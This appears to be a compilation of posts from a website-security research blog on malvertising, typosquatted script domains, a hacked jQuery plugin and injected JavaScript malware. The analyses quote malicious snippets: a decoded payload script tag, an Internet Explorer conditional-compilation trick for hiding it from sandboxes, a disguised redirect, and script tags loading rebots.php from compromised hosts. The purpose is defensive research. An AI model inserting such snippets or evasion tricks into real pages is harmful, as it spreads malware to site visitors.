Malvertising on a Website Without Ads

When you first configure your website, whether it be WordPress, Joomla, Drupal, or any other flavor of the month, it is often in its purest state. Unless ofcourse the server was previously compromised, which in it of itself is another conversation outright. Barring that one instance, the new website should not exhibit any malicious behavior. Or so you would think.

It’s rare though that a default theme will satisfy your every need, it’s often has just enough to wet your beak and get you thinking of ways to extend functionality. So we set off to extend and leverage all the features our favorite CMS offer us.

Watering Down Core Security

The next steps are to add on, to extend. New themes, plugins, sliders, animated gifs, music… no, wait, that’s too 1990’s. Let’s focus on themes, plugins, templates and various other extensions found in today’s modern CMS applications.

Often, the first thing you have in mind when choosing anything for your website is functionality and aesthetics, right? We all want something that looks great and improves user experience. It may be a really cool theme or the newest social network plugin; it’s not a common practice however to inspect its behavior.

What if one of the add-ons you installed is injecting hidden ads on your site? Or what if they are loading pop-up windows like this one?

HD Video Player Advertisement

Malicious Fake Flash Download

This is exactly what a client recently experienced. After installing a clean install of their CMS, configuring and extending it with a new theme, their website started to present it’s users with a Flash installer. For those wondering, this is fairly common, and is something known as a Drive-by-Download. More on that another time though.

Following The Trail

As is natural for us in the research group we can’t help but get lost in cookie trails, every crumbs proves to be more fascinating than that last.

While investigating, it became apparent that the Flash installer was being loaded via an ad, an ad that was being served via an ad network. Immediately I’m thinking malvertising, right?

In this case, the owner hadn’t configured advertising though and yet it was loading content from an ad network.

For your reference, here’s the HTTP Request showing the ad was being loaded by the infected website.

HTTP Headers of the Malvertising Campaign

HTTP Headers of the Malvertising Campaign

While investigating the code I couldn’t find any reference to the adcash.com domain in either the theme or plugin files. Again, the website owner confirmed that he was not using any ad networks. So that left us no choice but to dig a little deeper, we started to investigate the HTTP traffic.

While intercepting the sites Requests and Responses I came across the following entry:

Sucuri - AdCash

Sucuri – AdCash

It’s a request to hxxp:// 37.187.248.215 that returned a 302 Redirect to adcash.com. Yes, success!!! All right! We are one step closer to the source, I was probably looking for the wrong URL in the source code. Duh… Address noted, let’s keep checking the HTTP traffic.

Checking the HTTP responses for that IP address I found this:

URL Variable in HTTP Headers

URL Variable in HTTP Headers

There it is, the hit counter JavaScript code was loading the ad, as you can see the URL in the uri84 variable. It is making a request here: counter6.statcounterfree.com. This request was causing the popup, but was only being triggered once per visitor and the content looks random, suspicious and, more importantly, unwanted.

Adware or Malvertising?

Turns out that the client did in fact add the counter script to their themes footer, so it didn’t come prepackaged. They were trying to keep track of their visitors, they had no intentions of their site being used to serve ads though.

So being that the source of the counter was www.freecounterstat.com I decided to spend some time familiarizing myself with what they do. I spent some time reading through their End User License Agreement (EULA), you never know what goodness you agree too.

Unfortunately, no luck, nothing related to terms or privacy on the website. So I contacted their support to see if this type of behavior was expected.

Based on their response, I’d argue it probably wasn’t:

Hi,

I turn off popup on your account

chris

This is the message I received from support. There are obviously a number of things with that response that worry me, but now the clients website is clean. Whether intentional or not, it’s hard to say, but I’d likely categorize it as a compromised ad network and a malvertising attack.

Personally, I’d stop using this counter script. It’s obviously very 1990 for one, but more importantly if the solution is to disable ads for this site, but not address the bigger issue of drive by downloads being used via the service, that is very concerning. We’ve written about the dangers third-party scripts and service introduce to your environment, this is another example of that.

Conclusion

It is really hard to keep an online service, and even harder if you are doing this for free, so it is understandable that a service uses the adware model to maintain itself. However, it must disclose this to it’s users and offer them an option to opt out. To do it and not offer a user this options is wrong, and as website owners you must be more diligent.

Always check the terms, EULA and privacy policies of third-party software you are using on your website. If they don’t have them, that’s probably a good sign not to use them. Look for any suspicious terms before agreeing to them. If you need help, or you suspect that a plugin or theme is behaving maliciously, let us know.

We love looking through code and potential issues…:) Hit us up at labs@sucuri.net. Happy hunting!!

Typos Can have a Bigger Impact Than Expected

Have you ever thought about the cost of a typo? You know what I mean, a simple misspelling of a word somewhere on your website. Do you think there’s a risk in that?

You may have seen the Grammar Police all over your comments yelling that you used the wrong version of “your” and pointing out how stupid you are, right? Unfortunately, that’s the internet. But what if you have misspelled something that your readers can’t see right away?

Gogle API

What if your typo was in some third-party JavaScript? For example, ajax.gogleapis.com instead of ajax.googleapis.com ? There’s a chance that the domain doesn’t exist and the website just breaks, forcing you to spend some time debugging it to find the wrong include. No big deal. But there is a more dangerous possibility here. The domain could be registered and serving malware to those websites.

Luckily enough the owner of ajax.gogleapis.com, Robin Bradshaw, reached out to us with his findings. He posted on Twitter in response to a recent post of ours about the dangers of hosting third-party scripts. Bradshaw told us that he bought the domain because he was bored and wanted to check if those typos were an issue. He got some interesting data.

It is impressive how many hits it has been receiving since February:

Graphs show 70K views per month

Monthly visits to the misspelled gogleapis.com

Most traffic is coming from Brazilian IP addresses, which is getting there thorough an NGO website. They were contacted to fix this typo, but they never replied. Still waiting for the fix. All the other websites seem to be fixing their code quickly.

Brazil is largest by far, followed by Italy and US

Breakdown of countries using the typos script

Since Bradshaw is such a great guy, not only he did take the typo away from the hands of a person with malicious intentions, but he’s also serving a valid working copy of the ga.js file. Could you imagine how harmful it would be if someone else had gotten a hold of this domain? Someone could easily add to that ga.js file and serve malware or injected malicious SEO.

Typo Squatting

We have looked at one of the possible typos, but what about others?

Of course other people have already thought about using this technique as a way to distribute malware. In this case, the idea is not to register the domain and wait for someone to mistakenly write the URL incorrectly, but rather to deceive the user when they are investigating malicious or suspicious code on their website.

I was able to find a similarly misspelled URL: googleaspis(dot)com. The content is not malicious right now, but it is not serving the right script and it is redirecting the user to a different website.

HTTP headsers of googleaspis.com Redirects to another domain

Googleaspis(dot)com Redirects

A quick check on GitHub revealed one repository with a link to this website. Interestingly, the file name was index_malware.html. The website owner probably wasn’t able to find the malware there and recreated the whole index file, but it’s just speculation.

Github shows typo in index_malware.html

Github shows typo in index_malware.html

There are other typo domains hosted on the same server, like: facebookapis(dot)com, facebboklogin(dot)com, fgoogleapis(dot)com, oogleapis(dot)com and many others.

Conclusion

During my checks I didn’t find any malicious code being hosted by misspelled domains, but that doesn’t mean that there aren’t any. I checked more than 200 variations of Google’s domains used to host scripts for statistics and styles, and all the sites which answered were parked domains. The most suspicious behavior is the one I shared in this post. It does provide for some interesting food for thought though.

Remember to check and double-check all the external content you add to your site. Make sure it’s from a reliable source and that it is typed correctly. The price of a single misspelled character on a domain can be really high.

The Dangers of Hosted Scripts – Hacked jQuery Timers

Google blacklisted a client’s website claiming that malicious content was being displayed from “forogozoropoto(dot)2waky (dot)com”.

A scan didn’t reveal anything suspicious. The next step was to check all third-party scripts on the website. Soon we found the offending script. It was hxxp://jquery .offput .ca/js/jquery.timers.js – a jQuery Timers plugin that was moderately popular 5-6 years ago.

Right now, the jquery.offput.ca site is hacked. The home page appears to be blank, but it contains a few hidden links, one of which leads to a pharma spam doorway on another hacked site:

Unmask Parasites report for jquery.offput.ca

Unmask Parasites report for jquery.offput.ca


All JavaScript files on the website contain malicious code.

Sucuri SiteCheck report: infected jquery.js on jquery.offput.ca

Sucuri SiteCheck report: infected jquery.js on jquery.offput.ca



The plugin script jquery.timers.js is no exception (note the first line of code):

infected jquery.timers.js code

Infected jquery.timers.js code

The Payload

The malware in the JavaScript files is quite interesting.

First of all, the obfuscated part decodes to:

<script src="hxxp://forogozoropoto(dot)2waky(dot)com/7"></script>

So, we know this is definitely the source of the problem.

Next, you may have noticed this construction:

if(/*@cc_on!@*/false){malicious code}

Most browsers ignore the comment and never execute the malicious code, taking it as:

if(false){malicious code}

Internet Explorer is different. It interprets the comment as a conditional compilation statement and considers everything between /*@cc_on and @*/ as executable JavaScript. In this case, IE will see the injected code as:

if(!false){malicious code} 

It will always execute the malicious code, due to the inclusion of the commented “!” character.

This IE-only, conditional compilation hack will prevent the forogozoropoto(dot)2waky(dot)com script from loading in non-IE browsers, even if using an IE User-Agent string. This means that if you are using, say, a Linux sandbox with a browser that pretends to be Internet Explorer, and then monitor the HTTP traffic — you will not see any requests to forogozoropoto(dot)2waky(dot)com.

One more interesting thing here is that hxxp://jquery.offput.ca/js/jquery.timers.js only contains the malicious code if you request it using an IE User-Agent. For any other browsers, it returns unmodified code of the jQuery Timers plugin. This looks like either a server-level infection that patches JavaScript responses on-the-fly for qualifying requests, or hackers changed the handler of JavaScript files, making them executable by PHP (e.g. using AddHandler and php_value auto_prepend_file in .htaccesss ).

What Happened to the jQuery Timers Plugin?

After the initial release and a few years of plugin support, the developer lost interest and abandoned the jquery.offput.ca site. The page says the plugin has moved to the official jQuery plugin repository, and all updates will be available there only:

jQuery timers moved

jQuery timers moved

However, the repository URL is redirecting to jQuery.com, and it can’t be found using the search function. I suppose that the plugin has been completely abandoned, only living in local copies on some websites, and as as the hacked original version on the jquery.offput.ca site.

The Risks of Using Hosted Scripts

This is neither the first abandoned script, nor the last. Thousands of developers create plugins for jQuery. Many develop their own libraries. Some of those libraries become really popular, but there is no guarantee that developers will remain committed to supporting their software forever.

Of course, when you find some cool new script, you might want to do some tests linking directly to the script on the developer’s website — it’s fast, it works on any computer, and you don’t have to worry about serving extra JavaScript files — just focus on your own code. However, what works during the test stage is not always a great idea for a live public site.

Consider these potential situations and outcomes:

  • The plugin site is temporarily down (e.g. maintenance or server problem) — your site is broken.
  • The plugin author updated the .JS file with a buggy or incompatible version of the plugin – your site is broken.
  • The plugin author abandons the site (the domain expires) or moves the plugin to a different domain — your site is broken.
  • The plugin site gets hacked and some malicious code is injected into the plugin file — your site is spreading malware to your visitors.

There are plenty of risks connected to using scripts from third-party websites. As a web developer, you should generally avoid this practice. The only reasonable exception is using JavaScript libraries from trusted CDNs (e.g. Google Hosted Libraries). You can be sure that the CDN will guarantee integrity and availability of the files you need for a reasonably long time. All the rest should be hosted on servers that you control.

Please review your site code. If it still uses the jQuery Timers plugin, make sure to use a local version (you can get a clean version here) and don’t link to the infected jquery.timers.js file on the jquery.offput.ca site.

If you see any other scripts linked directly to third-party websites, you might want to consider serving those scripts directly from your site, or from a trusted CDN. This will prove to be a more reliable and secure solution.

Spotting Malicious Injections in Otherwise Benign Code

Being able to spot suspicious code, and then determine whether it is benign or malicious is a very important skill for a security researcher. Every day we scan through megabytes of HTML, JS and PHP. It’s quite easy to miss something bad, especially when it doesn’t visually stick out and follows patterns of a legitimate code.

Let’s take a look at this screenshot:

seo-position-report .net  - Good or Bad?

seo-position-report .net – Good or Bad?

We can see two scripts at the bottom of the HTML code. The scripts are not obfuscated, have variables with clear names (seoJsHost, amount, orderId) and comments. The structure and placement of the scripts resembles Google’s scripts (e.g. Google Analytics). And we can see that the first script loads a JS file from “seo-position-report .net/SEO-report/js/seoTrac.js“, which suggests that it’s some kind of SEO tracker.

So far so good. There are many little-known third-party trackers — it’s probably one of those. It’s typical for them to load additional scripts from their sites.

The second script most likely configures the code loaded by the first script and prepares it to work with the current site. Quite plausible. So nothing suspicious — let’s move on to the next file…

Stop! Not so fast. You should not trust the code that you see for the first time. Let’s dig deeper, what exactly does the seoTrac.js do? Here is the complete source code:

window.location='http://js.seo-position-report.net';

It’s a page redirection code. It always redirects visitors to that js.seo-position-report.net page. This is not an expected behavior for a script that positions itself as a tracker. Moreover, this redirect prevents execution of the second script.

Now it’s clear that both scripts are simply masking the unwanted redirect and can be considered malicious, regardless of what that js.seo-position-report.net does. By the way, currently it redirects to various ad networks which point to scam ads, adultfriendfinder, and sometimes to parked domains.

Don’t Judge a Book by It’s Cover

What looked quite benign at the first glance, ended up being malicious after a more thorough analysis. So don’t be fooled by the look of code. Scrutinize everything that you can’t recognize.

As a website owner or webmaster, you should be familiar with all the third-party scripts that your website uses so that you could easily spot anything that doesn’t belong. I realize, that it may be not trivial for modern sites that use dozens of different scripts. No problem, you need to employ some sort of integrity control for your site. For example, use a version control system, or simply compare (e.g. diff) server files with canonical backup copies. This way you’ll eliminate the “human factor” and won’t need to rely on your code reading skills only.

Popular Brazilian Site “Porta dos Fundos” Hacked

A very well known Brazilian comedy site, “Porta dos Fundos,” was recently hacked and is pushing malware (drive-by-download) via a malicious Flash executable, as you can see from our Sitecheck results:

SiteCheck Found Malware on Porta dos Fundos

SiteCheck Found Malware on Porta dos Fundos

If you do not want the joke to be on you, do not visit this site (portadosfundos) until it has been cleaned.

The infection starts with malicious javascript injected at the top of the code, which loads content from another compromised site, www.gpro.co.mz:


Read More

New iFrame Injections Leverage PNG Image Metadata

We’re always trying to stay ahead of the latest trends, and today we caught a very interesting one that we have either been missing, or it’s new. We’ll just say it’s new.. ;)

We’re all familiar with the idea of iFrame Injections, right?

Understanding an iFrame Injection

The iFrame HTML tag is very standard today, it’s an easy way to embed content from another site into your own. It’s supported by almost all browsers and employed by millions of websites today, use Adsense? Then you have an iFrame embedded within your site too.

Pretty nifty, I know. Like with most things though, the good is always accompanied with the bad.

Read More

Rebots.php JavaScript Malware Being Actively Injected

Holy JavaScript malware, Batman! On August 11th we started seeing the Rebot JavaScript malware string injected on various websites. Since then, it has increased its appearances, and has variated the way it’s being included on the infected sites.

Rebots

When you visit a compromised site, it will attempt to load an additional JavaScript, like one of these:

<script src="http://lig-limp.com.br/rebots.php"..

<script; src="http://chezbruna.com.br/imagens/rebots.php"..


Read More